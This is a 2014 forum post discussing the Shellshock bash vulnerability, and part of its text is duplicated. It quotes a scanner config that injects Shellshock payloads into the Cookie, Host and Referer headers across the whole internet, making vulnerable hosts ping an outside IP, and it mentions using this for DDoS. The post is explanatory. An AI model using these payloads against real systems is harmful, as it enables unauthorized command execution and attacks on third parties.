Show Posts
1
Hacking and Security / Re: 'Shell Shock' bug blasts OS X, Linux systems wide open
« on: September 25, 2014, 05:04:45 PM »
This article has a nice example of exploiting this bug:
http://www.troyhunt.com/2014/09/everything-you-need-to-know-about.html
By creating a HTTP request like this:
The attacker is able to (in this situation) have the target ping a specific IP. Imagine many targets doing this simultaneously to perform a DDOS attack as seen in the post below:
http://www.mirror.co.uk/news/technology-science/technology/shellshock-bug-first-malware-exploit-4323080
http://www.troyhunt.com/2014/09/everything-you-need-to-know-about.html
By creating a HTTP request like this:
Code: [Select]
target = 0.0.0.0/0
port = 80
banners = true
http-user-agent = shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)
http-header = Cookie:() { :; }; ping -c 3 209.126.230.74
http-header = Host:() { :; }; ping -c 3 209.126.230.74
http-header = Referer:() { :; }; ping -c 3 209.126.230.74The attacker is able to (in this situation) have the target ping a specific IP. Imagine many targets doing this simultaneously to perform a DDOS attack as seen in the post below:
http://www.mirror.co.uk/news/technology-science/technology/shellshock-bug-first-malware-exploit-4323080